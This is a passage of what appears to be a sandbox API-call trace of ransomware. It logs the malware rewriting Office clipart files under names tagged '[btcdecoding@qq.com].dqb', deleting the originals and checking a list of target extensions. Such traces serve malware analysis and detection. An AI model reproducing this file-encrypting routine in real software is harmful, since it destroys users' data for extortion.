nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x127e, lpOverlapped=0x0) returned 1 [0051.006] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1280, lpOverlapped=0x0) returned 1 [0051.007] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0051.007] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.007] SetEndOfFile (hFile=0x228) returned 1 [0051.007] CloseHandle (hObject=0x228) returned 1 [0051.007] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.007] SetEndOfFile (hFile=0x1dc) returned 1 [0051.008] CloseHandle (hObject=0x1dc) returned 1 [0051.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.008] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0051.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.008] lstrlenW (lpString=".doc") returned 4 [0051.008] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.008] lstrlenW (lpString=".docx") returned 5 [0051.008] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.008] lstrlenW (lpString=".pdf") returned 4 [0051.008] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.008] lstrlenW (lpString=".xls") returned 4 [0051.008] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.008] lstrlenW (lpString=".xlsx") returned 5 [0051.008] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.008] lstrlenW (lpString=".ppt") returned 4 [0051.009] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.009] lstrlenW (lpString=".zip") returned 4 [0051.009] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.009] lstrlenW (lpString=".rar") returned 4 [0051.009] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.009] lstrlenW (lpString=".bz2") returned 4 [0051.009] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.009] lstrlenW (lpString=".7z") returned 3 [0051.009] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.009] lstrlenW (lpString=".dbf") returned 4 [0051.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.009] lstrlenW (lpString=".1cd") returned 4 [0051.009] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.009] lstrlenW (lpString=".jpg") returned 4 [0051.009] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.010] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.010] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.010] GetLastError () returned 0x0 [0051.010] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1634, lpOverlapped=0x0) returned 1 [0051.012] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1640, lpOverlapped=0x0) returned 1 [0051.013] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0051.013] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.013] SetEndOfFile (hFile=0x228) returned 1 [0051.013] CloseHandle (hObject=0x228) returned 1 [0051.013] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.013] SetEndOfFile (hFile=0x1dc) returned 1 [0051.014] CloseHandle (hObject=0x1dc) returned 1 [0051.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0051.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.014] lstrlenW (lpString=".doc") returned 4 [0051.015] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString=".docx") returned 5 [0051.015] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.015] lstrlenW (lpString=".pdf") returned 4 [0051.015] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString=".xls") returned 4 [0051.015] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.015] lstrlenW (lpString=".xlsx") returned 5 [0051.015] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.015] lstrlenW (lpString=".ppt") returned 4 [0051.015] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.015] lstrlenW (lpString=".zip") returned 4 [0051.015] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.015] lstrlenW (lpString=".rar") returned 4 [0051.015] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString=".bz2") returned 4 [0051.015] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString=".7z") returned 3 [0051.015] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.015] lstrlenW (lpString=".dbf") returned 4 [0051.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.015] lstrlenW (lpString=".1cd") returned 4 [0051.015] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.015] lstrlenW (lpString=".jpg") returned 4 [0051.015] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.016] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.016] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.016] GetLastError () returned 0x0 [0051.016] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5062, lpOverlapped=0x0) returned 1 [0051.018] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5070, lpOverlapped=0x0) returned 1 [0051.019] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0051.019] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.019] SetEndOfFile (hFile=0x228) returned 1 [0051.019] CloseHandle (hObject=0x228) returned 1 [0051.019] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.020] SetEndOfFile (hFile=0x1dc) returned 1 [0051.020] CloseHandle (hObject=0x1dc) returned 1 [0051.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0051.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0051.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0051.021] lstrlenW (lpString=".doc") returned 4 [0051.021] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.021] lstrlenW (lpString=".docx") returned 5 [0051.021] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.021] lstrlenW (lpString=".pdf") returned 4 [0051.021] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.021] lstrlenW (lpString=".xls") returned 4 [0051.021] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.021] lstrlenW (lpString=".xlsx") returned 5 [0051.021] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.021] lstrlenW (lpString=".ppt") returned 4 [0051.021] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0051.021] lstrlenW (lpString=".zip") returned 4 [0051.021] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.021] lstrlenW (lpString=".rar") returned 4 [0051.021] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.021] lstrlenW (lpString=".bz2") returned 4 [0051.021] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.021] lstrlenW (lpString=".7z") returned 3 [0051.021] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0051.022] lstrlenW (lpString=".dbf") returned 4 [0051.022] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0051.022] lstrlenW (lpString=".1cd") returned 4 [0051.022] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0051.022] lstrlenW (lpString=".jpg") returned 4 [0051.022] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.023] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.023] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.023] GetLastError () returned 0x0 [0051.023] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x2a50, lpOverlapped=0x0) returned 1 [0051.024] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2a60, lpOverlapped=0x0) returned 1 [0051.025] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0051.025] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.025] SetEndOfFile (hFile=0x228) returned 1 [0051.026] CloseHandle (hObject=0x228) returned 1 [0051.026] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.026] SetEndOfFile (hFile=0x1dc) returned 1 [0051.026] CloseHandle (hObject=0x1dc) returned 1 [0051.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.027] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0051.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0051.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0051.027] lstrlenW (lpString=".doc") returned 4 [0051.027] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.027] lstrlenW (lpString=".docx") returned 5 [0051.027] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.027] lstrlenW (lpString=".pdf") returned 4 [0051.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.027] lstrlenW (lpString=".xls") returned 4 [0051.027] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.027] lstrlenW (lpString=".xlsx") returned 5 [0051.027] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.027] lstrlenW (lpString=".ppt") returned 4 [0051.027] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0051.027] lstrlenW (lpString=".zip") returned 4 [0051.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.027] lstrlenW (lpString=".rar") returned 4 [0051.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.028] lstrlenW (lpString=".bz2") returned 4 [0051.028] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.028] lstrlenW (lpString=".7z") returned 3 [0051.028] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0051.028] lstrlenW (lpString=".dbf") returned 4 [0051.028] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0051.028] lstrlenW (lpString=".1cd") returned 4 [0051.028] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0051.028] lstrlenW (lpString=".jpg") returned 4 [0051.028] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.028] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.028] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.028] GetLastError () returned 0x0 [0051.028] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x385c, lpOverlapped=0x0) returned 1 [0051.312] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3860, lpOverlapped=0x0) returned 1 [0051.344] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0051.345] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.345] SetEndOfFile (hFile=0x228) returned 1 [0051.345] CloseHandle (hObject=0x228) returned 1 [0051.345] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.345] SetEndOfFile (hFile=0x1dc) returned 1 [0051.346] CloseHandle (hObject=0x1dc) returned 1 [0051.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0051.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0051.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0051.347] lstrlenW (lpString=".doc") returned 4 [0051.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.347] lstrlenW (lpString=".docx") returned 5 [0051.347] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.347] lstrlenW (lpString=".pdf") returned 4 [0051.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.347] lstrlenW (lpString=".xls") returned 4 [0051.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.347] lstrlenW (lpString=".xlsx") returned 5 [0051.347] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.347] lstrlenW (lpString=".ppt") returned 4 [0051.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0051.347] lstrlenW (lpString=".zip") returned 4 [0051.347] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.347] lstrlenW (lpString=".rar") returned 4 [0051.347] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.348] lstrlenW (lpString=".bz2") returned 4 [0051.348] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.348] lstrlenW (lpString=".7z") returned 3 [0051.348] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0051.348] lstrlenW (lpString=".dbf") returned 4 [0051.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0051.348] lstrlenW (lpString=".1cd") returned 4 [0051.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0051.348] lstrlenW (lpString=".jpg") returned 4 [0051.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.918] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.918] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.918] GetLastError () returned 0x0 [0052.918] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xa4c, lpOverlapped=0x0) returned 1 [0052.920] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xa50, lpOverlapped=0x0) returned 1 [0052.921] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0052.921] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.921] SetEndOfFile (hFile=0x214) returned 1 [0052.921] CloseHandle (hObject=0x214) returned 1 [0052.921] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.921] SetEndOfFile (hFile=0x17c) returned 1 [0052.922] CloseHandle (hObject=0x17c) returned 1 [0052.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.922] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0052.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0052.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0052.923] lstrlenW (lpString=".doc") returned 4 [0052.923] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.923] lstrlenW (lpString=".docx") returned 5 [0052.923] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.923] lstrlenW (lpString=".pdf") returned 4 [0052.923] lstrcmpiW 